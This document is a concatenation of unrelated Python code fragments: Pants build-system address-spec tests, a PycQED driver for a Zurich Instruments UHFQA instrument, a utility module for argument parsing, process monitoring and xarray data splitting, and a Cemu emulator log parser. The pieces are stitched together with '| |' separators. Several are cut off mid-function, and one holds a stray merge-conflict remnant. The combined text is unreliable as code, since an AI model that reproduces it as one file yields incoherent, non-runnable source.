result = rule_runner.request(Addresses, [AddressSpecs(specs, filter_by_global_options=True)])
return set(result)
def test_address_specs_literals_vs_globs(address_specs_rule_runner: RuleRunner) -> None:
address_specs_rule_runner.write_files(
{
"demo/BUILD": dedent(
"""\
generator(sources=['**/*.txt'])
"""
),
"demo/f1.txt": "",
"demo/f2.txt": "",
"demo/subdir/f.txt": "",
"demo/subdir/f.another_ext": "",
"demo/subdir/BUILD": "mock_tgt(name='another_ext', sources=['f.another_ext'])",
"another_dir/BUILD": "mock_tgt(sources=[])",
}
)
def assert_resolved(spec: AddressSpec, expected: set[Address]) -> None:
result = resolve_address_specs(address_specs_rule_runner, [spec])
assert result == expected
# Literals should be "one-in, one-out".
assert_resolved(AddressLiteralSpec("demo"), {Address("demo")})
assert_resolved(
AddressLiteralSpec("demo/f1.txt"), {Address("demo", relative_file_path="f1.txt")}
)
assert_resolved(
AddressLiteralSpec("demo", None, "f1.txt"), {Address("demo", generated_name="f1.txt")}
)
assert_resolved(
AddressLiteralSpec("demo/subdir", "another_ext"),
{Address("demo/subdir", target_name="another_ext")},
)
assert_resolved(
# Match all targets that reside in `demo/`, either because explicitly declared there or
# generated into that dir. Note that this does not include `demo#subdir/f2.ext`, even
# though its target generator matches.
SiblingAddresses("demo"),
{
Address("demo"),
Address("demo", relative_file_path="f1.txt"),
Address("demo", generated_name="f1.txt"),
Address("demo", relative_file_path="f2.txt"),
Address("demo", generated_name="f2.txt"),
},
)
assert_resolved(
# Should include all generated targets that reside in `demo/subdir`, even though their
# target generator is in an ancestor.
SiblingAddresses("demo/subdir"),
{
Address("demo", relative_file_path="subdir/f.txt"),
Address("demo", generated_name="subdir/f.txt"),
Address("demo/subdir", target_name="another_ext"),
},
)
all_tgts_in_demo = {
Address("demo"),
Address("demo", relative_file_path="f1.txt"),
Address("demo", generated_name="f1.txt"),
Address("demo", relative_file_path="f2.txt"),
Address("demo", generated_name="f2.txt"),
Address("demo", relative_file_path="subdir/f.txt"),
Address("demo", generated_name="subdir/f.txt"),
Address("demo/subdir", target_name="another_ext"),
}
assert_resolved(DescendantAddresses("demo"), all_tgts_in_demo)
assert_resolved(AscendantAddresses("demo/subdir"), all_tgts_in_demo)
assert_resolved(
AscendantAddresses("demo"),
{
Address("demo"),
Address("demo", relative_file_path="f1.txt"),
Address("demo", generated_name="f1.txt"),
Address("demo", relative_file_path="f2.txt"),
Address("demo", generated_name="f2.txt"),
},
)
def test_address_specs_deduplication(address_specs_rule_runner: RuleRunner) -> None:
"""When multiple specs cover the same address, we should deduplicate to one single Address."""
address_specs_rule_runner.write_files(
{"demo/f.txt": "", "demo/BUILD": "generator(sources=['f.txt'])"}
)
specs = [
AddressLiteralSpec("demo"),
SiblingAddresses("demo"),
DescendantAddresses("demo"),
AscendantAddresses("demo"),
# We also include targets generated from `demo` to ensure that the final result has both
# the generator and its generated targets.
AddressLiteralSpec("demo", None, "f.txt"),
AddressLiteralSpec("demo/f.txt"),
]
assert resolve_address_specs(address_specs_rule_runner, specs) == {
Address("demo"),
Address("demo", generated_name="f.txt"),
Address("demo", relative_file_path="f.txt"),
}
def test_address_specs_filter_by_tag(address_specs_rule_runner: RuleRunner) -> None:
address_specs_rule_runner.set_options(["--tag=+integration"])
address_specs_rule_runner.write_files(
{
"demo/f.txt": "",
"demo/BUILD": dedent(
"""\
generator(name="a", sources=["f.txt"])
generator(name="b", sources=["f.txt"], tags=["integration"])
generator(name="c", sources=["f.txt"], tags=["ignore"])
"""
),
}
)
assert resolve_address_specs(address_specs_rule_runner, [SiblingAddresses("demo")]) == {
Address("demo", target_name="b"),
Address("demo", target_name="b", relative_file_path="f.txt"),
Address("demo", target_name="b", generated_name="f.txt"),
}
# The same filtering should work when given literal addresses, including generated targets and
# file addresses.
literals_result = resolve_address_specs(
address_specs_rule_runner,
[
AddressLiteralSpec("demo", "a"),
AddressLiteralSpec("demo", "b"),
AddressLiteralSpec("demo", "c"),
AddressLiteralSpec("demo/f.txt", "a"),
AddressLiteralSpec("demo/f.txt", "b"),
AddressLiteralSpec("demo", "a", "f.txt"),
AddressLiteralSpec("demo", "b", "f.txt"),
AddressLiteralSpec("demo", "c", "f.txt"),
],
)
assert literals_result == {
Address("demo", target_name="b"),
Address("demo", target_name="b", generated_name="f.txt"),
Address("demo", target_name="b", relative_file_path="f.txt"),
}
def test_address_specs_filter_by_exclude_pattern(address_specs_rule_runner: RuleRunner) -> None:
address_specs_rule_runner.set_options(["--exclude-target-regexp=exclude_me.*"])
address_specs_rule_runner.write_files(
{
"demo/f.txt": "",
"demo/BUILD": dedent(
"""\
generator(name="exclude_me", sources=["f.txt"])
generator(name="not_me", sources=["f.txt"])
"""
),
}
)
assert resolve_address_specs(address_specs_rule_runner, [SiblingAddresses("demo")]) == {
Address("demo", target_name="not_me"),
Address("demo", target_name="not_me", relative_file_path="f.txt"),
Address("demo", target_name="not_me", generated_name="f.txt"),
}
# The same filtering should work when given literal addresses, including generated targets and
# file addresses.
literals_result = resolve_address_specs(
address_specs_rule_runner,
[
AddressLiteralSpec("demo", "exclude_me"),
AddressLiteralSpec("demo", "not_me"),
AddressLiteralSpec("demo", "exclude_me", "f.txt"),
AddressLiteralSpec("demo", "not_me", "f.txt"),
AddressLiteralSpec("demo/f.txt", "exclude_me"),
AddressLiteralSpec("demo/f.txt", "not_me"),
],
)
assert literals_result == {
Address("demo", target_name="not_me"),
Address("demo", target_name="not_me", relative_file_path="f.txt"),
Address("demo", target_name="not_me", generated_name="f.txt"),
}
def test_address_specs_do_not_exist(address_specs_rule_runner: RuleRunner) -> None:
address_specs_rule_runner.write_files(
{"real/f.txt": "", "real/BUILD": "mock_tgt(sources=['f.txt'])", "empty/BUILD": "# empty"}
)
def assert_resolve_error(specs: Iterable[AddressSpec], *, expected: str) -> None:
with engine_error(contains=expected):
resolve_address_specs(address_specs_rule_runner, specs)
# Literal addresses require for the relevant BUILD file to exist and for the target to be
# resolved.
assert_resolve_error(
[AddressLiteralSpec("fake", "tgt")], expected="'fake' does not exist on disk"
)
assert_resolve_error(
[AddressLiteralSpec("fake/f.txt", "tgt")],
expected="'fake/f.txt' does not exist on disk",
)
did_you_mean = ResolveError.did_you_mean(
bad_name="fake_tgt", known_names=["real"], namespace="real"
)
assert_resolve_error([AddressLiteralSpec("real", "fake_tgt")], expected=str(did_you_mean))
assert_resolve_error([AddressLiteralSpec("real/f.txt", "fake_tgt")], expected=str(did_you_mean))
# SiblingAddresses requires at least one match.
assert_resolve_error(
[SiblingAddresses("fake")],
expected="No targets found for the address glob `fake:`",
)
assert_resolve_error(
[SiblingAddresses("empty")], expected="No targets found for the address glob `empty:`"
)
# MaybeEmptySiblingAddresses does not require any matches.
assert not resolve_address_specs(
address_specs_rule_runner, [MaybeEmptySiblingAddresses("fake")]
)
assert not resolve_address_specs(
address_specs_rule_runner, [MaybeEmptySiblingAddresses("empty")]
)
# DescendantAddresses requires at least one match.
assert_resolve_error(
[DescendantAddresses("fake"), DescendantAddresses("empty")],
expected="No targets found for these address globs: ['empty::', 'fake::']",
)
# AscendantAddresses does not require any matches.
assert not resolve_address_specs(
address_specs_rule_runner, [AscendantAddresses("fake"), AscendantAddresses("empty")]
)
def | |
<filename>pycqed/instrument_drivers/physical_instruments/ZurichInstruments/UHFQuantumController.py
"""
To do:
- split off application dependent code, as done for ZI_HDAWG8.py
Notes:
Changelog:
20190113 WJV
- started Changelog
- addressed many warnings identified by PyCharm
- started adding type annotations
- split of stuff into _add_node_pars()
- made some properties 'private'
20190219 WJV
- tagged some dead code with FIXM.
20190219:
- made _array_to_combined_vector_string() a @staticmethod
20190417 WJV
- merged branch 'develop' into 'feature/cc', changes:
spec_mode_on
spec_mode_off
20190429 WJV
- merged branch 'QCC_testing' into 'feature/cc', changes:
load_default_settings(): awgs_0_dio_strobe_index changed from 31 (CCL) to 15 (QCC)
20190612 WJV
- merged branch 'QCC_testing' into 'feature/cc', changes:
adds awg_sequence_acquisition_and_DIO_RED_test()
20190618 WJV
- merged branch 'develop' into 'feature/cc', changes:
20190813 NH
- merged branch 'develop' into 'feature/ZIupdateDrivers'
- Updated driver to use new UHFQA nodes
- Updated to support dynamic waveform upload properly. The AWG is configured when start() is called and the
driver then chooses whether it is necessary to recompile the AWG program. The program will be recompiled
if waveform lengths have changed. Otherwise, if waveforms have been updated they will just be downloaded
directly to the instrument.
20200214 WJV
- removed unused parameter repetitions from _find_valid_delays()
- also removed parameter repetitions from calibrate_CC_dio_protocol()
- split off calibrate_dio_protocol() from calibrate_CC_dio_protocol() to allow standalone use
20200217 WJV
- moved DIO calibration helpers to their respective drivers
- we now implement new interface CalInterface
- removed self._dio_calibration_mask and added parameter dio_mask where appropriate
"""
import time
import logging
import inspect
import numpy as np
from typing import Tuple,List
import pycqed.instrument_drivers.physical_instruments.ZurichInstruments.ZI_base_instrument as zibase
import pycqed.instrument_drivers.physical_instruments.ZurichInstruments.UHFQA_core as uhf
import pycqed.instrument_drivers.library.DIO as DIO
from qcodes.utils import validators
from qcodes.utils.helpers import full_class
log = logging.getLogger(__name__)
##########################################################################
# Exceptions
##########################################################################
##########################################################################
# Class
##########################################################################
class UHFQC(uhf.UHFQA_core, DIO.CalInterface):
"""
This is the PycQED driver for the 1.8 Gsample/s UHFQA developed
by Zurich Instruments.
Requirements:
Installation instructions for Zurich Instrument Libraries.
1. install ziPython 3.5/3.6 ucs4 19.05 for 64bit Windows from
http://www.zhinst.com/downloads, https://people.zhinst.com/~niels/
2. upload the latest firmware to the UHFQA using the LabOne GUI
"""
# Constants definitions from "node_doc_UHFQA.json"
DIOS_0_MODE_MANUAL = 0 # "0": "Manual setting of the DIO output value.",
DIOS_0_MODE_AWG_SEQ = 1 # "1": "Enables setting of DIO output values by AWG sequencer commands.",
DIOS_0_MODE_AWG_WAV = 2 # "2": "Enables the output of AWG waveform data as digital pattern on the DIO connector." FIXME: LabOne says: "QA result"
# FIXME: comments in this file state: QuExpress thresholds on DIO (mode == 2)
DIOS_0_EXTCLK_50MHZ = 2 # FIXME: not in "node_doc_UHFQA.json"
AWGS_0_DIO_VALID_POLARITY_NONE = 0 # "0": "None: VALID bit is ignored.",
AWGS_0_DIO_VALID_POLARITY_HIGH = 1 # "1": "High: VALID bit must be logical high.",
AWGS_0_DIO_VALID_POLARITY_LOW = 2 # "2": "Low: VALID bit must be logical zero.",
AWGS_0_DIO_VALID_POLARITY_BOTH = 3 # "3": "Both: VALID bit may be logical high or zero."
##########################################################################
# 'public' functions: device control
##########################################################################
def __init__(self,
name,
device: str,
interface: str = 'USB',
address: str = '127.0.0.1',
port: int = 8004,
use_dio: bool = True,
nr_integration_channels: int = 10,
server: str = '',
**kw) -> None:
"""
Input arguments:
name: (str) name of the instrument
device (str) the name of the device e.g., "dev8008"
interface (str) the name of the interface to use ('1GbE' or 'USB')
address (str) the host where the ziDataServer is running (for compatibility)
port (int) the port to connect to for the ziDataServer (don't change)
use_dio (bool) assert to enable the DIO interface
nr_integration_channels (int) the number of integration channels to use (max 10)
server: (str) the host where the ziDataServer is running (if not '' then used instead of address)
"""
t0 = time.time()
self._use_dio = use_dio
# Used for extra DIO output to CC for debugging
self._diocws = None
# Holds the DIO calibration delay
self._dio_calibration_delay = 0
# Holds the number of configured cases
self._cases = None
super().__init__(name=name, device=device, interface=interface, address=address,
server=server, port=port, nr_integration_channels=nr_integration_channels,
**kw)
t1 = time.time()
log.info(f'{self.devname}: Initialized UHFQC in {t1 - t0:.3f}s')
##########################################################################
# 'public' overrides for UHFQA_core
##########################################################################
def load_default_settings(self, upload_sequence=True) -> None:
super().load_default_settings()
# Load an AWG program
if upload_sequence:
self.awg_sequence_acquisition()
# Configure the codeword protocol
if self._use_dio:
self.dios_0_mode(self.DIOS_0_MODE_AWG_WAV) # QuExpress thresholds on DIO (mode == 2), AWG control of DIO (mode == 1)
self.dios_0_drive(0x3) # Drive DIO bits 15 to 0
self.dios_0_extclk(self.DIOS_0_EXTCLK_50MHZ) # 50 MHz clocking of the DIO
self.awgs_0_dio_strobe_slope(0) # no edge, replaced by dios_0_extclk(2)
self.awgs_0_dio_strobe_index(15) # NB: 15 for QCC (was 31 for CCL). Irrelevant now we use 50 MHz clocking
self.awgs_0_dio_valid_polarity(2) # high polarity FIXME: does not match AWGS_0_DIO_VALID_POLARITY_HIGH
self.awgs_0_dio_valid_index(16)
# No rotation on the output of the weighted integration unit, i.e. take
# real part of result
for i in range(0, self._nr_integration_channels):
self.set('qas_0_rotations_{}'.format(i), 1.0 + 0.0j)
# remove offsets to weight function
self.set('qas_0_trans_offset_weightfunction_{}'.format(i), 0.0)
##########################################################################
# 'public' functions: generic AWG/waveform support
##########################################################################
def load_awg_program_from_file(self, filename) -> None:
"""
Loads an awg sequence onto the UHFQA from a text file.
File needs to obey formatting specified in the manual.
Only provided for backwards compatibility purposes.
"""
print(filename)
with open(filename, 'r') as awg_file:
self._awg_program[0] = awg_file.read()
self._awg_needs_configuration[0] = True
def _do_set_AWG_file(self, filename) -> None:
self.load_awg_program_from_file('UHFLI_AWG_sequences/'+filename)
def awg_file(self, filename) -> None:
"""Only provided for backwards compatibility purposes."""
self.load_awg_program_from_file(filename)
def awg_update_waveform(self, index, data) -> None:
raise NotImplementedError(
'Method not implemented! Please use the corresponding waveform parameters \'wave_chN_cwM\' to update waveforms!')
##########################################################################
# 'public' functions: DIO support
##########################################################################
def plot_dio(self, bits=range(32), line_length=64) -> None:
data = self.getv('awgs/0/dio/data')
zibase.plot_timing_diagram(data, bits, line_length)
##########################################################################
# 'public' functions: weight & matrix function helpers
##########################################################################
def prepare_SSB_weight_and_rotation(self, IF,
weight_function_I=0,
weight_function_Q=1,
rotation_angle=0,
length=4096 / 1.8e9,
scaling_factor=1) -> None:
# FIXME: merge conflict 20200918
#=======
# def check_errors(self, errors_to_ignore=None) -> None:
#>>>>>>> ee1ccf208faf635329ea2c979da5757ce4ce8e14
"""
Sets default integration weights for SSB modulation, beware does not
load pulses or prepare the UFHQC progarm to do data acquisition
"""
trace_length = 4096
tbase = np.arange(0, trace_length / 1.8e9, 1 / 1.8e9)
cosI = np.array(np.cos(2 * np.pi * IF * tbase + rotation_angle))
sinI = np.array(np.sin(2 * np.pi * IF * tbase + rotation_angle))
if length < 4096 / 1.8e9:
max_sample = int(length * 1.8e9)
# setting the samples beyond the length to 0
cosI[max_sample:] = 0
sinI[max_sample:] = 0
self.set('qas_0_integration_weights_{}_real'.format(weight_function_I),
np.array(cosI))
self.set('qas_0_integration_weights_{}_imag'.format(weight_function_I),
np.array(sinI))
self.set('qas_0_rotations_{}'.format(
weight_function_I), scaling_factor*(1.0 + 1.0j))
if weight_function_Q != None:
self.set('qas_0_integration_weights_{}_real'.format(weight_function_Q),
np.array(sinI))
self.set('qas_0_integration_weights_{}_imag'.format(weight_function_Q),
np.array(cosI))
self.set('qas_0_rotations_{}'.format(
weight_function_Q), scaling_factor*(1.0 - 1.0j))
def prepare_DSB_weight_and_rotation(self, IF, weight_function_I=0, weight_function_Q=1) -> None:
trace_length = 4096
tbase = np.arange(0, trace_length/1.8e9, 1/1.8e9)
cosI = np.array(np.cos(2 * np.pi*IF*tbase))
sinI = np.array(np.sin(2 * np.pi*IF*tbase))
self.set('qas_0_integration_weights_{}_real'.format(weight_function_I),
np.array(cosI))
self.set('qas_0_integration_weights_{}_real'.format(weight_function_Q),
np.array(sinI))
# the factor 2 is needed so that scaling matches SSB downconversion
self.set('qas_0_rotations_{}'.format(weight_function_I), 2.0 + 0.0j)
self.set('qas_0_rotations_{}'.format(weight_function_Q), 2.0 + 0.0j)
##########################################################################
# Overriding private ZI_base_instrument methods
##########################################################################
def _add_extra_parameters(self) -> None:
"""
We add a few additional custom parameters on top of the ones defined in the device files. These are:
AWG_file - allows the user to configure the AWG with a SeqC program from a specific file.
Provided only because the old version of the driver had this parameter. It is discouraged to use
it.
wait_dly - a parameter that enables the user to set a delay in AWG clocks cycles (4.44 ns) to be
applied between when the AWG starts playing the readout waveform, and when it triggers the
actual readout.
cases - a parameter that can be used to define which combination of readout waveforms to actually
download to the instrument. As the instrument has a limited amount of memory available, it is
not currently possible to store all 1024 possible combinations of readout waveforms that would
be required to address the maximum number of qubits supported by the instrument (10). Therefore,
the 'cases' mechanism is used to reduce that number to the combinations actually needed by
an experiment.
dio_calibration_delay - the delay that is programmed on the DIO lines as part of the DIO calibration
process in order for the instrument to reliably sample data from the CC. Can be used to detect
unexpected changes in timing of the entire system. The parameter can also be used to force a specific
delay to be used on the DIO although that is not generally recommended.
"""
super()._add_extra_parameters()
self.add_parameter(
'AWG_file',
set_cmd=self._do_set_AWG_file,
docstring='Configures the AWG with a SeqC program from a specific file. '
'Provided only for | |
# -*- coding: utf-8 -*-
"""
Module with tools functions used on classes.
"""
import os
import numpy as np
import xarray as xr
from copy import deepcopy
import psutil
import errno
import argparse
import ghalton as gh
# import matplotlib.pyplot as plt
# from matplotlib import cm
# from matplotlib import ticker
# from matplotlib.widgets import Slider, RadioButtons
support3d = True
try:
from mpl_toolkits.mplot3d import Axes3D
except ImportError:
support3d = False
#
# Functions to Arguments validations
#
def argsparsefraction(txt):
"""
Validate the txt argument as value between 0.0 and 1.0.
:param txt: argument is a float string between 0.0 and 1.0.
:return: float
"""
msg = "Value shoud be a float between 0.0 and 1.0"
try:
value = float(txt)
if value < 0 or value > 1.0:
raise argparse.ArgumentTypeError(msg)
return value
except ValueError:
raise argparse.ArgumentTypeError(msg)
def argsparselist(txt):
"""
Validate the list of txt argument.
:param txt: argument with comma separated int strings.
:return: list of strings.
"""
txt = txt.split(',')
listarg = [i.strip() for i in txt]
return listarg
def argsparseintlist(txt):
"""
Validate the list of int arguments.
:param txt: argument with comma separated numbers.
:return: list of integer converted numbers.
"""
txt = txt.split(',')
listarg = [int(i) for i in txt]
return listarg
def argsparseinputlist(txt):
"""
Validate the single or multiple input names argument.
- Formats:
- Single: one input name string. Ex: native.
- Multiple: input names with sequential range numbers. Ex: native02:05
:param txt: argument of input name.
:return: list with a single input name or multiples separated input names.
"""
inputsets = []
if txt.count(':') == 0:
inputsets.append(txt)
elif txt.count(':') == 1:
ifinal = txt.split(':')[1]
if ifinal.isdecimal():
ifinal = int(ifinal)
iname = list(txt.split(':')[0])
iinit = ''
for i in iname[::-1]:
if not i.isdecimal():
break
iinit += iname.pop()
if len(iinit):
iname = ''.join(iname)
iinit = int(iinit[::-1])
inputsets = [iname + ('%02d' % i) for i in range(iinit,
ifinal + 1)]
else:
msg = "Wrong compost inputset name syntax: \nParameter " \
"<initialnumber> parameter snot found. <inputsetname>_" \
"[<initialnumber>:<finalnumber>]. Ex: native_01:10"
raise argparse.ArgumentTypeError(msg)
else:
msg = "\nWrong compost inputset name syntax: \nParameter " \
"<finalnumber> not found. <inputsetname>_" \
"[<initialnumber>:<finalnumber>]. Ex: native_01:10"
raise argparse.ArgumentTypeError(msg)
else:
msg = "\nWrong compost inputset name syntax: \nYou should specify " \
"only two input sizes. <inputsetname>_" \
"[<initialnumber>:<finalnumber>]. \nEx: native_01:10"
raise argparse.ArgumentTypeError(msg)
return inputsets
def argsparsefloatlist(txt):
"""
Validate the list int argument.
:param txt: argument of comma separated int strings.
:return: list of integer converted ints.
"""
txt = txt.split(',')
listarg = [float(i.strip()) for i in txt]
return listarg
#
# Functions CPU processes and Threads monitoring
#
def thread_cpu_num(proc_id, thread_id):
fname = "/proc/%s/task/%s/stat" % (proc_id, thread_id)
try:
with open(fname, 'rb') as f:
st = f.read().strip()
except IOError as err:
if err.errno == errno.ENOENT:
# no such file or directory; it means thread
# disappeared on us
pass
raise
st = st[st.find(b')') + 2:]
values = st.split(b' ')
cpu_num = int(values[36])
return cpu_num
def find_procs_by_name(name):
"""
Return a list of processes ids with 'name' on command line.
:param name: Name to search on running process.
:return: list of processes ids
"""
ls = []
for p in psutil.process_iter(attrs=["name", "exe", "cmdline"]):
if name == p.info['name'] or \
p.info['exe'] and os.path.basename(p.info['exe']) == name or \
p.info['cmdline'] and p.info['cmdline'][0] == name:
ls.append(p)
return ls
def procs_list(name, prs=None):
"""
Buil a dictionary with running threads of a specific process.
:param name: Name to search on running process.
:param prs: threads processed before
:return: dictionary of processed threads.
"""
procs = find_procs_by_name(name)
if prs is None:
pts = {}
else:
pts = prs
for p in procs:
if p.pid in pts.keys():
thr = deepcopy(pts[p.pid])
else:
thr = {}
cpuchanged = False
for t in p.threads():
cpu_num = thread_cpu_num(p.pid, t.id)
if t.id in thr.keys():
if thr[t.id][-1] != cpu_num:
cpuchanged = True
thr[t.id].append(cpu_num)
else:
thr[t.id] = [cpu_num]
cpuchanged = True
if cpuchanged:
pts[p.pid] = deepcopy(thr)
return pts
#
# Functions to detect python enviroment
#
def get_python_enviroment():
"""
Detect the Python enviroment where the scripts running on.
:return: String with name of enviroment: pythonshell, ipythonshell,
jupyternotebookshell or unknownshell.
"""
try:
p_str = get_ipython().__class__.__name__
if p_str == 'ZMQInteractiveShell':
return 'jupyternotebookshell'
elif p_str == 'TerminalInteractiveShell':
return 'ipythonshell'
else:
return 'unkownshell'
except:
return 'pythonshell'
#
# Functions to conversion xarray and lists
#
def data_detach(data):
"""
Detach the independent and dependent variables from DataArray.
:param data: A xarray DataArray with data to detach
:return: Tuple with the variables x and y.
"""
x = []
y = []
data_serie = data.to_series()
for i in data_serie.iteritems():
x.append(i[0])
y.append(i[1])
xnp = np.array(x)
ynp = np.array(y)
return {'x': xnp, 'y': ynp, 'dims': data.dims}
# TODO: Refactoring the attach metrhod to input unsorted data
def data_attach(data, dims):
"""
Build a xarray DataArray from tuple with independent
and dependent variables.
:param data: A tuple of two lists: input values and output values
:param dims: Tuple of strings with dimensions
:return: DataArray of data.
"""
xnp = np.array(data['x'])
ynp = np.array(data['y'])
coords = {}
shape = []
for i, d in enumerate(dims):
x = sorted(np.unique(xnp[:, i]), key=int)
if d != 'frequency':
x = [int(v) for v in x]
coords[d] = x
shape.append(len(x))
data_da = xr.DataArray(np.reshape(ynp, newshape=shape),
dims=dims, coords=coords)
# sorted_base = []
# for i in range(len(coords) - 1):
# for j in coords[i][1]:
# for w in coords[i + 1][1]:
# sorted_base.append([j, w])
# idx_base = [np.where((xnp == (f, c)).all(axis=1))[0][0] for f, c in
# sorted_base]
# data_da = xr.DataArray(ynp[idx_base].reshape(tuple(shape)), coords=coords)
return data_da
def freq_hz(value):
label = float(value)
if label >= 1e9:
label = "%.2f GHz" % (label / 1e9)
elif label >= 1e6:
label = "%.2f MHz" % (label / 1e6)
elif label >= 1e3:
label = "%.2f KHz" % (label / 1e3)
else:
label = "%.2f Hz" % label
return label
def maptosequence(fseq,iseq):
"""
Map a sequence of floats, each element in range 0.0-1.0,
to an another sequence of values, find the elements whose indexes are
equivalent to a relative position in a range 0-1.0.
:param fseq: A list of float values
:param iseq: A list of target values
:return: A list of integer values equivalent to range of floats.
"""
equiv_seq = []
folds = len(iseq)-1
for i in fseq:
if i<0 or i>1.0:
print("Error: Sequence of floats should be only values "
"between 0.0 and 1.0")
return None
equiv_seq.append(iseq[round(float(i)*folds)])
return(equiv_seq)
def measures_split_train_test(measure, train_size):
"""
Split the train and test arrays from a xarray of measures using the
Halton sequence to make discrepancy less. The return object is a
list of arrays: [train_x, teste_x, train_y, test_y]
:param measure: A xarray os measures values
:param train_size: A integer with sie of elements splited to train
:return: A list of arrays.
"""
m_detach = data_detach(measure)
if len(m_detach['x'])<train_size:
print("Error: the train size shoud be lower than the size of arrays")
return None
dim = len(measure.dims)
sequencer = gh.Halton(dim)
points = np.array(sequencer.get(train_size))
x_rand = []
for i,v in enumerate(measure.dims):
x = measure.coords[v].values
x_rand.append(maptosequence(points[:,i],x))
x_rand = np.column_stack([i.reshape(len(i), 1) for i in np.array(x_rand)])
bool_idx = None
for i in x_rand:
if bool_idx is None:
bool_idx = (m_detach['x'] == i).all(axis=1)
else:
bool_idx = bool_idx | (m_detach['x'] == i).all(axis=1)
x_train = m_detach['x'][bool_idx]
x_test = m_detach['x'][~bool_idx]
y_train = m_detach['y'][bool_idx]
y_test = m_detach['y'][~bool_idx]
return [x_train,x_test,y_train,y_test]
def measures_idx_split_train_test(measure, train_size):
"""
Split the train and test arrays from a xarray of measures using the
Halton sequence to make discrepancy less. The return object is a
list of arrays of indexes: [train_idx, teste_idx]
:param measure: A xarray os measures values
:param train_size: A integer with sie of elements splited to train
:return: A list of arrays of indexes.
"""
m_detach = data_detach(measure)
if len(m_detach['x'])<train_size:
print("Error: the train size shoud be lower than the size of arrays")
return None
dim = len(measure.dims)
sequencer = gh.Halton(dim)
points = np.array(sequencer.get(train_size))
x_rand = []
for i,v in enumerate(measure.dims):
x = measure.coords[v].values
x_rand.append(maptosequence(points[:,i],x))
x_rand = np.column_stack([i.reshape(len(i), 1) for i in np.array(x_rand)])
bool_idx = None
for i in x_rand:
if bool_idx is None:
bool_idx = (m_detach['x'] == i).all(axis=1)
else:
bool_idx = bool_idx | (m_detach['x'] == i).all(axis=1)
idx_train = np.where(bool_idx)[0]
idx_test = np.where(~bool_idx)[0]
return [idx_train,idx_test]
# def plot2D(data, | |
from difflib import get_close_matches
import re
import requests
def regex_group(search, num, default=None):
try:
return search.group(num)
except (AttributeError, IndexError):
return default
def regex_match(findall, num, default=None):
try:
return findall[num]
except (TypeError, IndexError):
return default
def default(fallback):
def decorator_func(func):
func.default = fallback
return func
return decorator_func
def name(string=None):
def decorator_func(func):
nonlocal string
if string == None:
string = func.__name__
func.name = string
return func
return decorator_func
class Parser:
"""
Basic parser for Cemu log files.
This class should ONLY contain info that can be found using only the contents of the log file.
To extend this parser, inherit it and add your custom functions to self.embed.
See ExtraParser for an example.
"""
@name("init.loaded_title")
@default(False)
def loaded_title(self, file, info):
return bool(re.search(r"------- Loaded title -------", file))
@name("init.game_crashed")
@default(False)
def game_crashed(self, file, info):
if info["init.loaded_title"]:
return bool(re.search(r"Stack trace", file))
return False
@name("init.overwolf_issue")
@default(False)
def overwolf_issue(self, file, info):
if info["init.loaded_title"]:
return bool(re.search(r"ow-graphics-vulkan\.dll", file))
return False
@name("init.piracy_check")
@default(False)
def piracy_check(self, file, info):
if info["init.loaded_title"]:
return bool(re.search(r"\+0x001d9be4", file))
return False
@name("emulator.cemu_version")
@default("Unknown")
def cemu_version(self, file, info):
return regex_group(re.search(r"------- Init Cemu (.*?) -------", file), 1)
@name("emulator.cemuhook_version")
@default("N/A")
def cemuhook_version(self, file, info):
return regex_group(re.search(r"Cemuhook version: (.*?)$", file, re.M), 1)
@name("game.title_id")
@default("Unknown")
def title_id(self, file, info):
result = regex_group(re.search(r"TitleId: (.*?)$", file, re.M), 1)
return result.upper() if result else None
@name("game.title_version")
@default("Unknown")
def title_version(self, file, info):
return regex_group(re.search(r"TitleVersion: (v[0-9]+)", file), 1)
@name("game.rpx_hash.updated")
@default("Unknown")
def rpx_hash_updated(self, file, info):
updated = re.search(r"RPX hash \(updated\): (.*?)$", file, re.M)
if not updated:
updated = re.search(r"RPX hash: (.*?)$", file, re.M)
return regex_group(updated, 1)
@name("game.rpx_hash.base")
@default("Unknown")
def rpx_hash_base(self, file, info):
base = "N/A"
if info["game.rpx_hash.updated"]:
base = regex_group(re.search(r"RPX hash \(base\): (.*?)$", file, re.M), 1)
return base
@name("game.shadercache_name")
@default("Unknown")
def shadercache_name(self, file, info):
result = regex_group(re.search(r"shaderCache name: (.*?)$", file, re.M), 1)
if not result:
result = regex_group(
re.search(r"Shader cache file: shaderCache[\\/].*?[\\/](.*?)$", file, re.M),
1
)
return result
@name("specs.cpu")
@default("Unknown")
def cpu(self, file, info):
return regex_group(re.search(r"(?<!CPU[0-9] )CPU: (.*?) *$", file, re.M), 1)
@name("specs.ram")
@default("Unknown")
def ram(self, file, info):
return regex_group(re.search(r"RAM: ([0-9]+)MB", file), 1)
@name("specs.gpu")
@default("Unknown")
def gpu(self, file, info):
return regex_group(re.search(r"(?:GL_RENDERER: |Using GPU: )(.*?)$", file, re.M), 1)
@name("specs.gpu_driver")
@default("Unknown")
def gpu_driver(self, file, info):
result = regex_group(re.search(r"GL_VERSION: (.*?)$", file, re.M), 1)
if not result:
result = regex_group(re.search(r"Driver version: (.*?)$", file, re.M), 1)
return result
@name("settings.cpu_affinity")
@default("Unknown")
def cpu_affinity(self, file, info):
result = regex_group(re.search(r"Set process CPU affinity to (.*?)$", file, re.M), 1)
if result:
return " ".join(
map(
lambda x: f"CPU{ord(x[0]) - 0x30}",
result.split("CPU")[1:]
)
)
return "All cores"
@name("settings.cpu_mode")
@default("Unknown")
def cpu_mode(self, file, info):
return regex_group(re.search(r"CPU-Mode: (.*?)$", file, re.M), 1)
@name("settings.cpu_extensions")
@default("Unknown")
def cpu_extensions(self, file, info):
result = re.search(r"Recompiler initialized. CPU extensions: (.*?)$", file, re.M)
if result:
return list(filter(lambda x: x != "", regex_group(result, 1).split(' ')))
return []
@name("settings.disabled_cpu_extensions")
@default("")
def disabled_cpu_extensions(self, file, info):
used_extensions = re.search(r"CPU extensions that will actually be used by recompiler: (.*?)$", file, re.M)
used_extensions = regex_group(used_extensions, 1, '').split(' ')
if used_extensions != ['']:
return ', '.join(
list(filter(
lambda x: used_extensions.index(x) == -1,
info["settings.cpu_extensions"]
))
)
return None
@name("settings.backend")
@default("OpenGL")
def backend(self, file, info):
return regex_group(re.search(r"(Vulkan)", file), 1)
@name("settings.vulkan_async")
@default("Unknown")
def vulkan_async(self, file, info):
if info["settings.backend"] == "Vulkan":
result = re.search(r"Async compile: true", file)
return "Enabled" if result else "Disabled"
return "N/A"
@name("settings.gx2drawdone")
@default("Unknown")
def gx2drawdone(self, file, info):
if info["settings.backend"] == "Vulkan":
return "N/A"
result = re.search(r"Full sync at GX2DrawDone: true", file)
